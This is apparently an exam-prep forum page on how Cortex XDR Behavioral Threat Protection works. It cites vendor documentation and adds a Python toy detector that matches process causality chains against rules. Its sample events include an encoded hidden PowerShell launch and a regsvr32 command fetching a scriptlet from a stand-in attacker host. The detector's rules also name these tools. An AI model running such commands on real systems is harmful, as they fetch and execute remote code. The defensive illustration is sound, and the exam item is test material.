Which statement best describes how Behavioral Threat Protection (BTP) works?
Behavioral Threat Protection (BTP) works by matching Endpoint Detection and Response (EDR) data with rules provided by Cortex XDR. These rules help identify malicious causality chains and take actions such as blocking the threats. This approach ensures continuous monitoring of endpoint activity to catch sophisticated attacks leveraging built-in OS executables and common administration utilities.
Like nuna957 said, the answer should be C. See the following documentation by Palo Alto:

1) "BTP prevents sophisticated attacks that leverage built-in OS executables and common administration utilities by continuously monitoring endpoint activity for malicious causality chains"

2) "Palo Alto Networks researchers define the causality chains that are malicious and distribute those chains as behavioral threat rules. When the Cortex XDR agent detects a match to a behavioral threat protection rule, the Cortex XDR agent carries out the configured action (default is Block)."

1) https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/Cortex-XDR-Pro-Administrator-Guide/Endpoint-Protection-Capabilities
2) https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/Cortex-XDR-Prevent-Administrator-Guide/Add-a-New-Malware-Security-Profile
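As an added illustration of the mechanism the answer and the quoted documentation describe (this is example code written for this page, not code from the original post, the commenters, or Palo Alto Networks): a small Python model that keeps a table of process-start events, rebuilds the causality chain (root to leaf) for each new process, and compares that chain with rules that describe a malicious sequence of ancestors. A match returns the rule's configured action, with Block as the default. The event layout, the rule format, the two rules and the sample events are all constructed for the example and are not Cortex XDR's actual rule format, telemetry schema or rule content.

```python
"""Toy behavioral-threat-rule matcher over process causality chains.

Constructed example: it models the idea of matching a process's causal
ancestry against vendor-defined "malicious chain" rules and applying the
rule's action. Nothing here is the real Cortex XDR engine or rule syntax.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

Predicate = Callable[["ProcessEvent"], bool]


@dataclass
class ProcessEvent:
    """One process-start event as an endpoint agent might record it."""
    pid: int
    ppid: int
    image: str      # executable file name, lower-case
    cmdline: str


@dataclass
class BehavioralRule:
    """Ordered predicates the chain (root -> leaf) must satisfy in order.

    Matching processes need not be adjacent, so an intermediate cmd.exe
    between Word and PowerShell does not defeat the rule.
    """
    name: str
    chain: List[Predicate]
    action: str = "Block"   # default action, mirroring the quoted docs


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Two constructed rules describing well-known living-off-the-land chains.
RULES: List[BehavioralRule] = [
    BehavioralRule(
        name="office_app_to_encoded_powershell",
        chain=[
            lambda p: p.image in OFFICE_APPS,
            lambda p: p.image == "powershell.exe"
            and "-enc" in p.cmdline.lower(),   # also covers -encodedcommand
        ],
    ),
    BehavioralRule(
        name="regsvr32_remote_scriptlet",
        chain=[
            lambda p: p.image == "regsvr32.exe"
            and "/i:http" in p.cmdline.lower(),
        ],
    ),
]


class CausalityTracker:
    """Tracks parent/child links and evaluates rules on each new process."""

    def __init__(self, rules: List[BehavioralRule]):
        self.rules = rules
        self.procs: Dict[int, ProcessEvent] = {}

    def causality_chain(self, pid: int) -> List[ProcessEvent]:
        """Walk ppid links upward; return root-first list. Cycle-safe."""
        chain: List[ProcessEvent] = []
        seen = set()
        cur = self.procs.get(pid)
        while cur is not None and cur.pid not in seen:
            seen.add(cur.pid)
            chain.append(cur)
            cur = self.procs.get(cur.ppid)
        chain.reverse()
        return chain

    @staticmethod
    def _matches(chain: List[ProcessEvent], pattern: List[Predicate]) -> bool:
        """Greedy ordered-subsequence match of predicates against the chain."""
        i = 0
        for proc in chain:
            if i < len(pattern) and pattern[i](proc):
                i += 1
        return i == len(pattern)

    def ingest(self, ev: ProcessEvent) -> Optional[dict]:
        """Record the event; return a verdict dict on the first matching rule."""
        self.procs[ev.pid] = ev
        chain = self.causality_chain(ev.pid)
        for rule in self.rules:
            if self._matches(chain, rule.chain):
                return {"rule": rule.name, "action": rule.action,
                        "chain": [p.image for p in chain]}
        return None


# Constructed sample telemetry: a macro-driven chain, a benign admin
# chain, and a regsvr32 remote-scriptlet launch.
SAMPLE_EVENTS = [
    ProcessEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcessEvent(200, 100, "winword.exe", "winword.exe invoice.docm"),
    ProcessEvent(300, 200, "cmd.exe", "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA"),
    ProcessEvent(400, 300, "powershell.exe", "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    ProcessEvent(500, 100, "cmd.exe", "cmd.exe"),
    ProcessEvent(600, 500, "powershell.exe", "powershell.exe Get-Process"),
    ProcessEvent(700, 100, "regsvr32.exe",
                 "regsvr32.exe /s /n /u /i:http://attacker.example/a.sct scrobj.dll"),
]


def evaluate(events: List[ProcessEvent],
             rules: List[BehavioralRule] = RULES) -> List[Optional[dict]]:
    """Feed events in order; return one verdict (or None) per event."""
    tracker = CausalityTracker(rules)
    return [tracker.ingest(e) for e in events]


if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print(ev.pid, ev.image, verdict or "allowed")
```

The point the model makes is the one in the quoted documentation: the agent does not judge powershell.exe or regsvr32.exe on their own, since both are legitimate OS binaries. It judges the chain that produced them, which is why the benign explorer -> cmd -> powershell sequence passes while the Word-rooted one is blocked.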
is the correct